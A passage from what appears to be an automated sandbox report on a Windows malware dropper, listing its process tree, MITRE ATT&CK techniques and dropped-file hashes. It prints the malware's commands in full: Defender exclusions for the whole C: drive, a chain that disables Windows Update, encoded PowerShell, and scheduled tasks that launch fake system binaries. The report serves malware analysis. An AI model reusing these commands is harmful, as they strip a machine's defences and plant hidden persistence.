- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#dzb#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#zpw#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:100

C:\Users\Admin\AppData\Local\Temp\Protector.exe
"C:\Users\Admin\AppData\Local\Temp\Protector.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:2936

C:\comsavesbroker\containersavesdhcp.exe
"C:\comsavesbroker\containersavesdhcp.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comsavesbroker/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qDUaLb8GTu.bat"
8⤵
PID:380

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
9⤵
PID:1972

C:\Recovery\WindowsRE\smss.exe
"C:\Recovery\WindowsRE\smss.exe"
9⤵
- Executes dropped EXE
PID:5704

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b9573a7-b80e-4bff-a6a6-c78cbfadbc85.vbs"
10⤵
PID:5888

C:\Recovery\WindowsRE\smss.exe
C:\Recovery\WindowsRE\smss.exe
11⤵
PID:5424

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b2b59731-772f-43ab-b73b-09bc48c84fb2.vbs"
10⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\AntiDebug.exe
"C:\Users\Admin\AppData\Local\Temp\AntiDebug.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:360

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:3412

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:4540

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1552

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:3688

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:2140

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1892

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:764

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:2492

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:5208

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:5232

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:5256

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5296

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5272

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:5612

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:5596

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:5640

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:5692

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:5672

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:5656

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:5788

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:5864

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:5944

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:6004

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:6036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZQBrACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAGMAaAByAC4AZQB4AGUAIgAnACkAIAA8ACMAawBmAHEAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGYAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBiAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBHAE4AQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBrAHUAIwA+ADsA"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"
5⤵
PID:5340

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineGNC"
6⤵
PID:5396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\VertGLauncher.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\VertGLauncher.bat.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4484

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
4⤵
PID:552

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\VertGLauncher.bat.exe"
4⤵
- Views/modifies file attributes
PID:3524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containersavesdhcpc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\microsoft shared\VC\containersavesdhcp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containersavesdhcp" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\VC\containersavesdhcp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containersavesdhcpc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\microsoft shared\VC\containersavesdhcp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\Resources\Ease of Access Themes\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Windows\Resources\Ease of Access Themes\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\odt\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\odt\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\odt\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\odt\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\odt\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\odt\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\odt\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\odt\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\odt\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3988

C:\Program Files\Google\Chrome\updaterchr.exe
"C:\Program Files\Google\Chrome\updaterchr.exe"
1⤵
- Executes dropped EXE
PID:5428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="
2⤵
PID:6076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5264

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:4184

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5468

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

Impair Defenses

Modify Registry

Web Service

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Program Files\Google\Chrome\updaterchr.exe

Filesize
4.3MB

MD5
de0c1cad99b50eb867f1bfb11198f735

SHA1
b6de7ae80c7ec968856f1a2e51c13bd10d6564cb

SHA256
33f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727

SHA512
b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95

Download Submit
C:\Recovery\WindowsRE\smss.exe

Filesize
2.7MB

MD5
2eb597723779e68ebc8e5165588b3b45

SHA1
bf3a34d530b09c8e2dcccaa03dd5e7b412ec8fd3

SHA256
293c4c7269eebc12ec791910e9b85f22b2a653db8961eba30202450cd64c97d5

SHA512
f4f8fdb2f631072273f17742e25de5ebd2b9c895a72ad037ff9de1b2f61638020c7ddea15047c141f8f594f600dd83d2ff654a4ce5bf23a816b9f4da2919c623

Download Submit
C:\Recovery\WindowsRE\smss.exe

Filesize
2.7MB

MD5
2eb597723779e68ebc8e5165588b3b45

SHA1
bf3a34d530b09c8e2dcccaa03dd5e7b412ec8fd3

SHA256
293c4c7269eebc12ec791910e9b85f22b2a653db8961eba30202450cd64c97d5

SHA512
f4f8fdb2f631072273f17742e25de5ebd2b9c895a72ad037ff9de1b2f61638020c7ddea15047c141f8f594f600dd83d2ff654a4ce5bf23a816b9f4da2919c623

Download Submit
C:\Recovery\WindowsRE\smss.exe

Filesize
2.7MB

MD5
2eb597723779e68ebc8e5165588b3b45

SHA1
bf3a34d530b09c8e2dcccaa03dd5e7b412ec8fd3

SHA256
293c4c7269eebc12ec791910e9b85f22b2a653db8961eba30202450cd64c97d5

SHA512
f4f8fdb2f631072273f17742e25de5ebd2b9c895a72ad037ff9de1b2f61638020c7ddea15047c141f8f594f600dd83d2ff654a4ce5bf23a816b9f4da2919c623

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
614f88cf39eb3223246afec4bf1463b4

SHA1
74d738ee6fdada75ac1ef1645073005e3f6b6cfb

SHA256
021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

SHA512
84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
75b4b2eecda41cec059c973abb1114c0

SHA1
11dadf4817ead21b0340ce529ee9bbd7f0422668

SHA256
5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134

SHA512
87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4083d710d2193dcade0f9f54b468fe3

SHA1
4cbabe5d9fdb1bb484eb5243713e4fbc867cb76f

SHA256
